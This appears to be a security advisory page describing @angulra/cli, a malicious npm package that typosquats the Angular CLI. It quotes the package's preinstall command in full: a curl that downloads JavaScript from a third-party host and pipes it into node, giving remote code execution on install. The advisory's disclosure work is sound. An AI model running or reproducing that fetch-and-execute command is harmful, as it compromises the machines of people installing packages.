Logo
npm

@angulra/cli@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17495

Ecosystem

npm

Summary

The package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on npm install, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.

Source: amazon-inspector (e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.